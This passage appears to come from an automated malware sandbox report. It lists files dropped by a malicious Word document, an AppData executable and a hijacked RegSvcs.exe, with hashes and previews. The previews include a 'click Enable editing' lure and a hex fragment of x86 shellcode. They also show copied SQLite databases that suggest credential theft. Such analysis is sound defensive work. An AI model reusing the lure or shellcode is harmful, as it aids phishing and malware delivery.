                                          Reputation:low
                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):349696
                                          Entropy (8bit):3.4174960555913105
                                          Encrypted:false
                                          SSDEEP:6144:SyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeH:P
                                          MD5:8221C8FF5511971A9B54B830010CED5E
                                          SHA1:B53B50A051C9DEF8E1B38A450789CB81CF309A90
                                          SHA-256:2D297DD92E494726AC2CA9B12E8CF8A65880630B2E0656F6005167A1E0B0F735
                                          SHA-512:274A48AF6149B34188E9ABD94354DBAF3A49B6DA17A53C04A06999AB1574383061D4DBB013489B18273886BEE9D923620D425609996F84296F1FE6BD3C26D81F
                                          Malicious:false
                                          Preview:4.4.3.4.5.9.5.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                          Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):97792
                                          Entropy (8bit):7.014747102810205
                                          Encrypted:false
                                          SSDEEP:1536:3f3IwWiew9JOnlc9exhXLpLiw5kvYBnuRJd4d89cpmnn/amKyQH4b:v4wWcJOl0yfLi6RBnGQdCcSTKyw4b
                                          MD5:F19534A061ECC70BB81126F953505D72
                                          SHA1:C1613560EA60D1A0407BA6B06EEA10C874512A48
                                          SHA-256:97D29F1E5E3BB5C8C1EB956C0135A820825973869C1B098705490010E0216FA8
                                          SHA-512:C9828341199C910F8661A1A6FBFC28C7A00D88C9378247DD57A154906E191AF63E1AB793253A14DE1FE764C28703A48F75CCF16E9840941A2B4A221E23C6F8C6
                                          Malicious:false
                                          Preview:.i.HYIY1QKJ6..UV.37LPNA1.3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6.TUV],.BP.H.r.C..h.Y<8jF6;2$2^./1 /^'. -z;,_u"$....v>\S)~CL;w3BHZIY1..J6.UVV.;.PNA1S3BH.I[0^Jz6D TVS;7LPNA1m.CHZiY1UKJ6DT.VS.7LPLA1W3BHZIY1QKJ6DTUVS.6LPLA1S3BHYI..UKZ6DDUVS3'LP^A1S3BHJIY1UKJ6DTUV..6L.NA1S.CH.MY1UKJ6DTUVS37LPNA1S.CHVIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UkJ6LTUVS37LPNA1[.BH.IY1UKJ6DTUV}GR4$NA1.@CHZiY1U?K6DVUVS37LPNA1S3BHzIYQ{99D'TUV.77LP.@1S5BHZ?X1UKJ6DTUVS37L.NAq}A'$5*Y1YKJ6D.TVS17LP2@1S3BHZIY1UKJ6.TU.S37LPNA1S3BHZIY1u.K6DTUV.37LRND1.BHj.Y1VKJ6.TUPS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVH.>LpMA1R3BY)HY1_AHHGTURv. j.LA1W.DXZI_BWKJ<a.VVS7.MPNj^W3BBQq.3UKMYATU\D$..XNA0v%]B.@Y1Tn.<ETQ~U37F#IA1Y.g_D.P1UJo.FUUR{57LZ=F1S9.mBT.8UKK..STVW.1LPD26S3H.rHX1S$B6D^Yn.17LBLi8S3HE)@Y1SXNEhUUP@6&H.DA1YNCHZM';UK@%BEQ_ 87LZfM1S9-EZISLTKJ2UP.WS33S_.H1S2g.HHY5}MJ6N'RVS9XBPNK.I-.AZIX...J6@|SVS9DKPNK"U..AEw.8UKK...UVW.1LPD26S3H:[IYA+AJ6N|ZVS9.\PNK^]3BBwGH5.JJ6@|QWS5.@AJ:0S3F`YHY7FM[0lEUVY.aMPNP7E\PHZCJ9GCb%DT_9
                                          Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):77430
                                          Entropy (8bit):7.847295981704258
                                          Encrypted:false
                                          SSDEEP:1536:h7JUSmTdZHmVysGL4cdNtKFk8MfCCaeQ6++dzexRW0vqN:h7QZGVysGLDvQffC9Xyxs0vM
                                          MD5:30AB7658AD775CB44E4B08C7EBC12A2C
                                          SHA1:5D14B0BFB0AE504148EDC517F41DC0A5992ED935
                                          SHA-256:8FAD249F983DBF5CAAEF3D72A53210F4A1B2BE6D81B2EB3A59CF7151BF5666C1
                                          SHA-512:DCB6707E2290CBC21F4C3015E249001AB87A5A26945F4AE9E57D067C8FC135FA1847929F58B1039F9D0A2EB5FC50129B9DD47AF43EA9E4CFC2102EE762A91A70
                                          Malicious:false
                                          Preview:EA06..~..ZzT..&.1...Sm..V.....:.1...T....U..(.J.Z..1....x...vY..T?T....C.e.....qj.M.s)$....d....' ..r...E$.@#pk...S..t....#0Xu*m.......x....&.0.R.Sj$..V....1m.P...H....j.L.`.Pf5p...@*5...@..f...Uiu............)@....f..8....0......C.U.B? ....J.S..;[... ...h.)...`...63?...`....I..os...N.`cf.....1..@...`....S.7...O$..3.....8& ....Q.A*.X..G.u.R..(...R.Q&>|...j.Vf5`...T...<?.... s.e.A..t*..Y...4.E..U.]...T.....+..M~.W.....Z.S....u....P.7...K..h5J.r.$.pk.....%......n.O(.J...3..t.......J..J....Z.J.5..+S.4.9.[hUN..K...:.Z....*.I..3.z.T...$.M....*.@P......E..0.:.:.h..j........0.....'..it.-..Q..'.......Kh..MN.T..UZ...S...u.."cS.Y...Efk}....=J.S..(U.u.;I...5.Mb)..R....L.`.R....V1...n....U@*=:..k4.].. .V....p...W@H....5.R....^.5.P(4...3.X+4...M..-.Z.Z..........P.V.t....b..*.......*.i.H.Xi.....0....O....J.>.X...5...D.S-..p....H.....W%1.L.S..l.:u.5@...|.#T..$..-Jsq.M.T.]Bk...)..|.V.pR(.?..d....U........@.e2.5..h3j%JMJ.`&UZu.kv.Um.JX....I(.J.....]y.I.Noj..
                                          Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):9840
                                          Entropy (8bit):7.599061336130256
                                          Encrypted:false
                                          SSDEEP:192:6ZxWQa8nm1Wh8fpWAsdzNasmdge/rEoTyRLB7bNZUDLrMZkn:6Zx3a8nmYhzd0smr/rEvRLtZeDXMZo
                                          MD5:DD1E8868F31121B176C168A4A1B48E63
                                          SHA1:1A57A6B5DA768E963166B07A13A38EEC98F0878F
                                          SHA-256:D36E5C68763ED63F3068F5330F4D80488A0294C05663C30ADE57E017EA50F842
                                          SHA-512:F95B66FBDD3DD81861189ACC96A2C3121493C8109D37C29C68C99B572A37C551AAA44A8632985F4C8335E02D9B33F2C9501791FA3084310031E6E5417B1A6096
                                          Malicious:false
                                          Preview:EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b
                                          Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                          File Type:ASCII text, with very long lines (28756), with no line terminators
                                          Category:dropped
                                          Size (bytes):28756
                                          Entropy (8bit):3.5909811262375784
                                          Encrypted:false
                                          SSDEEP:768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6gn:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RC
                                          MD5:C2214B487E6119B5226D591926532EE9
                                          SHA1:D9A27C71655D441A47A92AA63AAD433F25625FB5
                                          SHA-256:33CE9852B482618CCE0E5C282FD710E02400CB310CEE839537DB9C2585167ADB
                                          SHA-512:0AB7541E705BC233A5F834C271C4888CC0F3DA45A7E10E659391CEFEF3082F7D993D94E79629111B35B4D8AFC3BACB83EA0BF57BA737C1B6D956825EF2A7C939
                                          Malicious:false
                                          Preview:A9E499CD8C02898115CEA73647257D6D456782227821727D946E9B8E916AF2AC47BE395D80BBCF6E100x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.702896917219035
                                          Encrypted:false
                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                          Malicious:false
                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.07093764277882578
                                          Encrypted:false
                                          SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                          MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                          SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                          SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                          SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                          Category:modified
                                          Size (bytes):131072
                                          Entropy (8bit):0.07093764277882578
                                          Encrypted:false
                                          SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                          MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                          SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                          SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                          SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.695860210921229
                                          Encrypted:false
                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                          Malicious:false
                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:Microsoft Word 2007+
                                          Category:dropped
                                          Size (bytes):16429
                                          Entropy (8bit):7.926773617204646
                                          Encrypted:false
                                          SSDEEP:384:tyXxo8qWds8PL8wi4OEwH8TIbE91r2fR3JYovij7XCnp:tcxIq5P3DOqnYJZ1vO7XCp
                                          MD5:9EDC82805ECC2D30F07D99973883C3C6
                                          SHA1:877FAE637A454593A1B66BFEDE20356803833266
                                          SHA-256:927E8668D7E5B22D0D278CB66ECBB15A51420F2FC5299AAA324D43A7D04719A2
                                          SHA-512:B24ED91E3F53FE2CFC0B0FDAEBCD495CBC878507187A802ED019736BE707D5D832F149360DBA0CFD394DF5E0406BD979FDA5AFF4357FE4E2BEDE514098FC8CF3
                                          Malicious:false
                                          Preview:PK.........H.X...7U... .......[Content_Types].xmlUT....6yf.6yf.6yf...n.0.E...............e.T....U.<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y...Iy.\.P.........M..X..s.x/%.9T....s...R.i&...j....:x.O].=.p...Z8....I.......U....Z........r.s....B.$...;.+.&Y..X%zQ.w.UHF....+..6.r.......-....w^.|_......H..x....1<k.)D.L:....1`.."B"{...D.....[#..wh...clmZ.%.&j...c.[C.`.v...3....!.c._.E.>p...~.~.PK.........H.X........N......._rels/.relsUT....6yf.6yf.6yf...j.0.@....Q....N/c......[IL...j...<...].aG....zs.Fu..]...U......^.[..x.....1x.p.....f..#I)..Y.............*D...i")..c$...qU...~3..1..jH[{..=E......~.f?..3-....].T.2.j).,.l0/%..b......z.....,..../.|f\.Z....?6.!Y._.o..]A..PK.........H.X.d.Q....1.......word/_rels/document.xml.relsUT....6yf.6yf.6yf...N.0.E.H..5{.<..:.J.B...<.c[.)...*.RQU]d9.s.H^.?.+.1R.".A.3..]....<. ...;T0"....Z=.......Dq..c.K).t8h.|@.^....i......."..d.2.<b.m. n.[......o....7........{A.t.%..-..I.%"..".9E..].P.....a>W.?g=.].k?..aq..nN..;...N
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with CRLF line terminators
